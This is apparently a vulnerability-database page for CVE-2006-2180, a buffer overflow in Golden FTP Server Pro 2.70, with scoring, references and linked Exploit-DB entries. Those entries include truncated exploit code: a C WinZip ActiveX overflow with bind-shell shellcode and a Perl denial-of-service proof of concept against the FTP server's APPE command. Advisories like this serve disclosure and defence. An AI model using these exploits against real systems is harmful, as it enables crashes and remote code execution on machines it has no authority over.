CVE-2006-2180
Published 2006-05-04
Priority: P4 · 31
CVSS 2.0: 6.4 (medium)
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:P
EXPLOIT
EPSS: 6.84% (93.2th percentile)
Buffer overflow in Golden FTP Server Pro 2.70 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via a long argument to the (1) NLST or (2) APPE commands, as demonstrated by the Infigo FTPStress Fuzzer.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kmint21_software | golden_ftp_server | — | — |
| kmint21_software | golden_ftp_server | — | — |
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 7 - CSS Width Element Denial of Service
exploitdb·2006-12-06
CVE-2006-6311 Microsoft Internet Explorer 7 - CSS Width Element Denial of Service
---
source: https://www.securityfocus.com/bid/21466/info
Microsoft Internet Explorer is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions.
This issue is triggered when an attacker entices a victim user to visit a malicious website.
Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.
Internet Explorer 6 and 7 are vulnerable to this issue; other versions may also be affected.
Another non-standards compliant IE D.O.S. IE makes my life harder :(. It sucks, don't use it :). Written by xiam. Tested under IE 6.0.2900.2180
Exploit-DB
WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
exploitdb·2006-11-15
CVE-2006-6884 WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
---
/* WinZip
*
* - prdelka
*/
#include
#include
#include
#include
#include
#include
#include
#define NOPSIZE 999999
struct target {
char* name;
int retaddr;
};
struct shellcode {
char* name;
short port;
int host;
char* shellcode;
};
int targetno = 1;
struct target targets[] = {
{"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
};
int shellno = 2;
struct shellcode shellcodes[] = {
{"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
"\x48\x40\xf5\x49\xd6\x4a\xf9\x91\x47\x96\x2f\xf8\x9b\x37\x41\xf5"
"\x99\x47\xf9\xf9\xfc\xf9\x48\x4e\x4b\x9b\x90\x9b\xf5\x97\x40\xf9"
"\xd6\x41\xf9\x48\x9b\x92\xfd\x9b\x49\x42\x4f\x9f\x90\xd6\x27\x9b"
"\x93\x46\x2f\x90\xfd\x4a\x6a\x51
Exploit-DB
Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)
exploitdb·2006-05-03
CVE-2006-2180 Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)
---
#!/usr/bin/perl
#
# Golden FTP Server Pro 2.70 Remote APPE command PoC exploit : DoS
# /JA
# https://www.securinfos.info
#
use Net::FTP;
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];
if (($host) && ($port)) {
# Exploit string (try with a different value if needed)
$exploit_string = "./A" x 1000;
print "Trying to connect to $host:$port\n";
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 60, Debug=> $debug) or die "[-] Connection failed\n";
print "[+] Connect OK!\n";
print "Logging...\n";
if (!$user) {
$user = "test";
$pass = "test";
}
$sock->login($user, $pass);
sleep(1);
$answer = $sock->message;
print $answer ."\n";
print "Sending string...\n";
$sock->quot("APP
No writeups or analysis indexed.
References
http://archives.neohapsis.com/archives/bugtraq/2006-05/0139.html
http://marc.info/?l=bugtraq&m=114658586018818&w=2
http://secunia.com/advisories/19917
http://www.infigo.hr/en/in_focus/tools
http://www.infigo.hr/hr/in_focus/advisories/INFIGO-2006-05-03
http://www.osvdb.org/25217
http://www.securityfocus.com/bid/17801
http://www.vupen.com/english/advisories/2006/1640
https://exchange.xforce.ibmcloud.com/vulnerabilities/26195